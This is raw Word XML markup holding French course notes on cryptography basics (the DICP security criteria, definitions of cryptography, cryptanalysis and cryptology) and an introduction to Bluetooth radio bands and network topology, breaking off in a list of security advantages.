    <w:p w14:paraId="606F8B2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="323ACBA9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="14A3E079" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="08BDD02D" w14:textId="3EA2BC53" w:rsidR="00534394" w:rsidRDefault="00534394" w:rsidP="00534394">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Module 12 : Cryptographie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040248AC" w14:textId="62CAFE46" w:rsidR="00534394" w:rsidRDefault="00534394" w:rsidP="00534394">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre 1 : Besoin de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B014AA0" w14:textId="77777777" w:rsidR="00534394" w:rsidRDefault="00534394" w:rsidP="00534394"/>
    <w:p w14:paraId="2628D736" w14:textId="77777777" w:rsidR="00534394" w:rsidRDefault="00534394" w:rsidP="00534394"/>
    <w:p w14:paraId="0CFF711A" w14:textId="2EE2899E" w:rsidR="00534394" w:rsidRDefault="00534394" w:rsidP="00534394">
      <w:r>
        <w:t xml:space="preserve">En se basant sur les critères de sécurité de l’analyse de risque qui sont : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C895B7" w14:textId="77777777" w:rsidR="00534394" w:rsidRDefault="00534394" w:rsidP="00534394"/>
    <w:p w14:paraId="6283B7A6" w14:textId="7B70EAD9" w:rsidR="00CE66A8" w:rsidRPr="00CE66A8" w:rsidRDefault="00CE66A8" w:rsidP="00534394">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE66A8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">DICP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1448FEB4" w14:textId="77777777" w:rsidR="00534394" w:rsidRPr="00534394" w:rsidRDefault="00534394" w:rsidP="00534394"/>
    <w:p w14:paraId="3BCC23C3" w14:textId="63271CC4" w:rsidR="00534394" w:rsidRDefault="00CE66A8" w:rsidP="00CE66A8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D =&gt; Disponibilité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7AEEC1" w14:textId="429857B3" w:rsidR="00CE66A8" w:rsidRDefault="00CE66A8" w:rsidP="00CE66A8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I =&gt; Intégrité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8B29C" w14:textId="068F65FB" w:rsidR="00CE66A8" w:rsidRDefault="00CE66A8" w:rsidP="00CE66A8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C =&gt; Confidentialité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF18CA3" w14:textId="634E8671" w:rsidR="00CE66A8" w:rsidRDefault="00CE66A8" w:rsidP="00CE66A8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">P =&gt; Preuve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(identification / non-répudiation / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tracabilité</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0A261" w14:textId="77777777" w:rsidR="00534394" w:rsidRDefault="00534394"/>
    <w:p w14:paraId="5D0947D5" w14:textId="77777777" w:rsidR="00534394" w:rsidRDefault="00534394"/>
    <w:p w14:paraId="57AA3020" w14:textId="77777777" w:rsidR="00CE66A8" w:rsidRDefault="00CE66A8"/>
    <w:p w14:paraId="49B4DD57" w14:textId="77777777" w:rsidR="009827A9" w:rsidRDefault="009827A9" w:rsidP="009827A9">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Chapitre 2 : Cryptographie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01208170" w14:textId="77777777" w:rsidR="009827A9" w:rsidRDefault="009827A9" w:rsidP="009827A9"/>
    <w:p w14:paraId="019699F2" w14:textId="4F4E9088" w:rsidR="009827A9" w:rsidRDefault="009827A9" w:rsidP="00514942">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Science mathématique permettant d’effectuer des opérations sur un texte intelligible afin d’assurer une ou plusieurs propriétés de la sécurité de l’information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D31C1" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46" w:rsidP="00514942">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EE08F0" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46" w:rsidP="00514942">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FBF402" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46" w:rsidP="00514942">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63675B26" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46" w:rsidP="00514942">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769B6183" w14:textId="14E310EC" w:rsidR="009827A9" w:rsidRPr="00826D46" w:rsidRDefault="00826D46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptanalyse </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57955E89" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46"/>
    <w:p w14:paraId="180F3512" w14:textId="564870D1" w:rsidR="00826D46" w:rsidRDefault="00826D46">
      <w:r>
        <w:t xml:space="preserve">La science permettant d’étudier les systèmes cryptographiques en vue de les tester ou de les causer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F63408" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46"/>
    <w:p w14:paraId="0C27F044" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46"/>
    <w:p w14:paraId="6FFBB80D" w14:textId="64422C7E" w:rsidR="00826D46" w:rsidRPr="00826D46" w:rsidRDefault="00826D46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptologie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFC037" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46"/>
    <w:p w14:paraId="26E48B30" w14:textId="6EA45608" w:rsidR="00826D46" w:rsidRDefault="00826D46">
      <w:r>
        <w:t xml:space="preserve">La science qui regroupe la cryptographie et cryptanalyse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708DB2B" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46"/>
    <w:p w14:paraId="5019F2BE" w14:textId="77777777" w:rsidR="00826D46" w:rsidRDefault="00826D46"/>
    <w:p w14:paraId="0441D5D7" w14:textId="468DE738" w:rsidR="00F1129E" w:rsidRDefault="00F1129E" w:rsidP="00F1129E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CEC2549" wp14:editId="4CA192F6">
            <wp:extent cx="2748201" cy="1691200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1823792004" name="Image 2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2004" name="Image 21" descr="Une image contenant texte, capture d’écran, Police, carte de visi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2752672" cy="1693951"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A23B1" w14:textId="77777777" w:rsidR="00CE66A8" w:rsidRDefault="00CE66A8"/>
    <w:p w14:paraId="47A0AB7E" w14:textId="607E7447" w:rsidR="00A73515" w:rsidRDefault="00A73515" w:rsidP="00A73515">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Module 13 : Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D00E67" w14:textId="13A0D9A8" w:rsidR="00A73515" w:rsidRDefault="00A73515" w:rsidP="00240329">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00240329">
        <w:t xml:space="preserve">Chapitre 1 : Qu’est-ce que le Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EFA07B" w14:textId="77777777" w:rsidR="00F1129E" w:rsidRDefault="00F1129E"/>
    <w:p w14:paraId="56A37804" w14:textId="77777777" w:rsidR="00A73515" w:rsidRDefault="00A73515"/>
    <w:p w14:paraId="2F148A5B" w14:textId="42163F52" w:rsidR="00A73515" w:rsidRDefault="00240329" w:rsidP="00240329">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluetooth est un standard de communication permettant l’échange bidirectionnel de données à très courte distance et utilisant des ondes radio UHF. Son objectif est de simplifier les connexions entre les appareils électroniques en supprimant des liaisons filaires. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEF3D20" w14:textId="77777777" w:rsidR="00240329" w:rsidRDefault="00240329" w:rsidP="00240329">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEFF766" w14:textId="2E30833C" w:rsidR="00240329" w:rsidRDefault="00240329" w:rsidP="00240329">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’objectif du Bluetooth est de transmettre des données ou de la voix entre des équipements possédants un circuit radio de faible coût. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0738E54B" w14:textId="77777777" w:rsidR="00240329" w:rsidRDefault="00240329" w:rsidP="00240329">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08852464" w14:textId="43513577" w:rsidR="00240329" w:rsidRDefault="00240329" w:rsidP="00240329">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le Bluetooth utilisant des ondes radio c’est pour cette raison que placer un objet, voire un mur entre l’émetteur et le récepteur n’empêche en aucun cas ka bonne transmission </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(2.4Ghz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDAAA69" w14:textId="1DF18466" w:rsidR="00240329" w:rsidRDefault="00240329" w:rsidP="00240329">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette bande faisant partie des bandes de fréquences dites </w:t>
      </w:r>
      <w:r w:rsidRPr="00342D35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ISM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Industrielles, scientifiques, médicale)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, elle ne nécessite pas de licence pour être exploité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49905E08" w14:textId="77777777" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC"/>
    <w:p w14:paraId="10F201B1" w14:textId="77777777" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC"/>
    <w:p w14:paraId="012A72C8" w14:textId="77777777" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC"/>
    <w:p w14:paraId="1D52EB21" w14:textId="11B1F34D" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 GHz </w:t>
      </w:r>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, four à micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB1B19E" w14:textId="04D53953" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5 GHz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699BC551" w14:textId="150C2BF2" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">433 MHz </w:t>
      </w:r>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>badyphones</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>alamres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> domotique, L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>oRa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DC4C00" w14:textId="3E5B1364" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">868 MHz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">(domotique, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>SigFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, LoRa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B97516" w14:textId="77777777" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0EC181" w14:textId="77777777" w:rsidR="00E861EC" w:rsidRDefault="00E861EC" w:rsidP="00E861EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0463EF1D" w14:textId="20C7FCDE" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre 2 : La topologie du réseau </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BD7CD" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE"/>
    <w:p w14:paraId="4A5AA042" w14:textId="30EEE91B" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bluetooth est un réseau de type « ad-hoc »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145A1114" w14:textId="6D505C1D" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il est auto-configurable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA510CB" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE"/>
    <w:p w14:paraId="45011743" w14:textId="2522E9E9" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les nœuds peuvent changer des données uniquement lorsqu’ils sont à portée de réception l’n par rapport à l’autre </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B5B6D5" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406E761B" w14:textId="3010BA45" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L’envoi d’information s’effectue par paquet lors des communication IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F781D4D" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B088AD" w14:textId="6D1AF77D" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chaque machine peut échanger des informations avec n’importe quelle machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C366A1" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55986765" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="00790EFE"/>
    <w:p w14:paraId="75FEC864" w14:textId="77777777" w:rsidR="00790EFE" w:rsidRPr="00790EFE" w:rsidRDefault="00790EFE" w:rsidP="009367FF">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760B33D3" w14:textId="77CDF845" w:rsidR="00A73515" w:rsidRDefault="00790EFE" w:rsidP="00790EFE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33BA58F1" wp14:editId="02CE0142">
            <wp:extent cx="3509556" cy="2159726"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="418969347" name="Image 23" descr="Une image contenant horloge,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9347" name="Image 23" descr="Une image contenant horloge, cercle, diagramm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3526923" cy="2170413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D79F67" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="00790EFE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081C689E" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="00790EFE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AACE2B7" w14:textId="77777777" w:rsidR="009367FF" w:rsidRDefault="009367FF" w:rsidP="00790EFE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDD9083" w14:textId="1BF1703E" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Chapitre X : Sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B70F3" w14:textId="7304CC00" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avantage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69535277" w14:textId="77777777" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674"/>
    <w:p w14:paraId="69100318" w14:textId="53BFD42F" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Largement utilisé techno connus et maitrisé </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F6D01" w14:textId="63078511" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gratuite et fiable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659F2A7" w14:textId="21FC42F0" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Taux de transferts augmenter par rapport à l’infra-rouge </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E047B63" w14:textId="5ED6FF8F" w:rsidR="000D4674" w:rsidRDefault="000D4674" w:rsidP="000D4674">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Faible puissance électrice avec un faible protocole aérien </w:t>
